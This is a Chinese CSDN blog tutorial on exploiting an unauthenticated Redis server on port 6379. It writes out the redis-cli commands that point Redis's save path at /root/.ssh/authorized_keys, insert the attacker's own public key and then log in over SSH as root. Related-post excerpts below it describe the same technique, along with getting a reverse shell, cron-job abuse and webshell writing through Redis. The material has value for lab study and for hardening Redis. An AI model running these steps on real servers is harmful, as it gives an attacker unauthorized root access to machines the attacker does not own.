Xshell工具利用Redis 6379写入SSH公钥漏洞

已于 2024-05-03 23:09:50 修改
阅读量302 收藏 3
点赞数 5
分类专栏: 渗透 文章标签: redis 网络安全 web安全 安全
于 2024-05-03 23:07:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49047967/article/details/138426414
版权

0x00 前期准备

工具使用:xshell
基础环境:
1. 启动ssh和redis服务
2. 防火墙放行22、6379端口(或关闭防火墙)

0x01 Xshell制作RSA密钥对

工具–>新建用户密钥生成向导,
然后一路下一步
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
这里由于是没有设置密钥,所以会出现弹窗,不用管,直接是

这个就是公钥了,也就是我们要写入的部分,但是别慌,直接保存下来一会再看
在这里插入图片描述
最后会出现这样的界面
在这里插入图片描述

0x02 redis写入ssh公钥

如果没有redis-cli,也可以使用telnet进行远程连接

telnet ip port
redis-cli -h ip -p port

注意修改协议,ip和端口,redis的端口默认为6379
在这里插入图片描述
在这里插入图片描述

连接上后就是这样,如要测试是否连接成功,执行ping即可
在这里插入图片描述
出现pong,即表示成功

config set dir /root/.ssh
config set dbfilename authorized_keys
set x "\n\n\n[替换]\n\n\n"

记得用公钥将’[替换]'进行替换

config set dir /root/.ssh
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAABIwAxVxlzw83oSzzYDSA8+5ncAZZbLKBtEvbVjFBpMyMiEj4NX+/3mA6RrlfQCfshYqP+vkxsj6o9YkI3d+3izKuqT4CUXcTdAanv7nnttXT6QqMFlZw7Ipa2RdwoJ304gD/d5j6pE8ht9qzEURkhCSrJFLR+xvjnDlcvrST07WbX7fKVvH85iFgX3I+Oas930MEp+hPoPy7Vs0PQJqPQvPXDwTUilbJs4gm4yQctA4XSdCIFUrtok07Okjm/bwTX4Coohrm22+I+jtRWHuxv9Cuk2npOyMdBrw+EQyTq8AW5lUsFjCFKAz9IWX/PFKAoPRMA3oacduTK8288fTxVbSw==\n\n\n"

第三个命令,至于为什么要在公钥前和后都使用换行符,这里因为公钥在authorized_keys文件中只有顶格写才能生效

在窗口一路复制粘贴命令即可
在这里插入图片描述

0x04 Xshell使用密钥连接到主机

这里正常填ssh服务的端口22
在这里插入图片描述
在身份验证这里选择public key 然后进行设置,选择使用密钥进行连接
记住要选中public key 不然设置是灰色的,无法进行点击
在这里插入图片描述
在这里插入图片描述
然后一路确定,最后环境使用root身份进行登陆即可
在这里插入图片描述
在这里插入图片描述

饭包不憨
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
xshell工具利用ssh进入系统后台,
10-10
利用ssh进入系统后台,
Xshell 7.0 SSH工具
06-16
亲测可用,压缩包附带使用说明
利用网站拿到服务器登录权限,利用Redis写入SSH公钥获取服务器登陆权限
weixin_36156325的博客
08-02 2585
前置条件:1、操作机已安装redis客户端:redis-cli2、已使用ssh-keygen生成用于测试的ssh公钥|私钥(ssh-keygen -t rsa -C "test")操作步骤:1、将之前生成的公钥写入文件中cd~/.ssh/(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>hack.txt2、将hack.txt写入靶机Redi...
redis未授权写入ssh公钥登录
m0_46576302的博客
09-09 3611
利用redis的备份功能,写入ssh公钥
SSRF+Redis写入公钥
qq_43665434的博客
04-03 3224
野径云俱黑,江船火独明。 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库(未授权访问) window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问写入公钥登录centos8 实验准备 思路: 先在自己的主机上生成公私钥对,利用redis的数据备份功能,将自己的公钥写入到目标服务器的/etc/authorized_keys中,然后使用ssh的私钥直接登录目标服务器。 条件: 1、redis服务使用root
Redis未授权访问配合SSH key的综合利用
hyy615545936的博客
09-11 1532
【实验原理】 利用 Redis 自身的提供的config命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以直接使用对应的私钥登录目标服务器。 步骤一:在本地生产公私钥文件 linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公...
redis攻防-ssh登录、主从复制、未授权访问、计划任务、写webshell
weixin_46626737的博客
06-30 617
cat key.txt | redis-cli -h 192.168.214.138 --pass(有密码则加,没密码不用) 123456 -x set wang。原理是:利用redis数据库将生成的ssh公钥发送到某一个用户./ssh目录下,然后直接利用ssh的私钥连接即可。主从模式,一个redis机器充当主机,可以进行写数据操作,其他的redis机器充当从机,只可以进行读操作。查看数据库中的内容:keys * (redis数据库没有表,是大量的键值对组成的)3)开启保护模式(protect-mode)
MobaXterm xshell增强版 linux连接工具 ssh
03-28
超级好用的ssh工具,不需要激活,永久免费,界面可以拆分成1个、2个、4个。
ssh工具xshell.zip
06-14
ssh工具xshell.zip
Java工具 redis图形化工具+xshell+xftp
06-19
Java工具 redis图形化工具+xshell+xftp 下载安装可用
Xshell_5.0.1199_XiaZaiBa
06-10
经过我本人的测试,这个软件可以用.我将它分享给各位网友
Redis未授权访问利用
LiuSiXian的博客
07-14 592
Redis服务器:192.168.100.10攻击机:192.168.15.101。
网络安全】通过Redis2.x实现ssh未授权访问
kinghzking的专栏
08-23 2364
下载redis-server(目标机器,kali):https://pan.baidu.com/s/1I9mByRQjFaNvt040xOm8_w?下载redis-cli(攻击机器,win11):https://pan.baidu.com/s/1qAkZMBUWVWJvU2bpBq_LNQ?redis刚好能满足我们的需求,2.x版本的redis,默认配置,能被外网访问,并完成上面的操作,我们正是利用这个特性,完成。攻击机(win11)上连接目标机(kali)目标机器的redis-server安装和配置。
基于公私钥认证对Redis未授权漏洞利用及防护措施
tpriwwq的专栏
10-23 2998
漏洞说明:Redis 默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys .
浅谈Linux下的redis攻击
qq_64201116的博客
10-17 5208
redis服务ip:192.168.65.163 (CentOs)redis服务ip:192.168.65.158 (Ubuntu)kali攻击机:192.168.65.158。
redis非授权访问漏洞
weixin_43995159的博客
11-29 1195
复现了三种redis未授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
漏洞复现之Redis未授权访问
最新发布
m0_56190544的博客
09-13 1404
本文详细介绍了redis未授权访问漏洞的原理以及利用方法,供大家参考学习
Linux的ssh免密登陆
十个菜
01-01 905
第一种情况两台主机链接: Linux主机1   ipxxxxxx1 win10主机2或者Linux主机2    ipxxxxxx2   在Linux主机1中操作 第一步:选择目录 cd .ssh 第二步:生成密钥,冒号直接空格或者填写密码,此处未填 ssh-keygen [root@Vs .ssh]# ssh-keygen Generating public/private rs...
xshell中删除redis
05-29
Xshell 中删除 Redis,可以按照以下步骤进行操作: 1. 登录 Redis 服务器 使用 Xshell 登录到 Redis 服务器。 2. 停止 Redis 服务 使用以下命令停止 Redis 服务: ``` sudo systemctl stop redis ``` 3. 删除 Redis 文件 使用以下命令删除 Redis 文件: ``` sudo rm -rf /etc/redis /var/lib/redis ``` 这将删除 Redis 的配置文件和数据文件。 4. 删除 Redis 用户和组 使用以下命令删除 Redis 用户和组: ``` sudo deluser --remove-home redis sudo delgroup redis ``` 这将删除 Redis 用户和组以及它们的主目录。 5. 确认删除 使用以下命令确认 Redis 是否已被完全删除: ``` which redis-server ``` 如果没有任何输出,则表示 Redis 已被完全删除。 请注意,在执行任何删除操作之前,请确保您已经备份了 Redis 中的所有数据,并且您确实想要删除 Redis

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值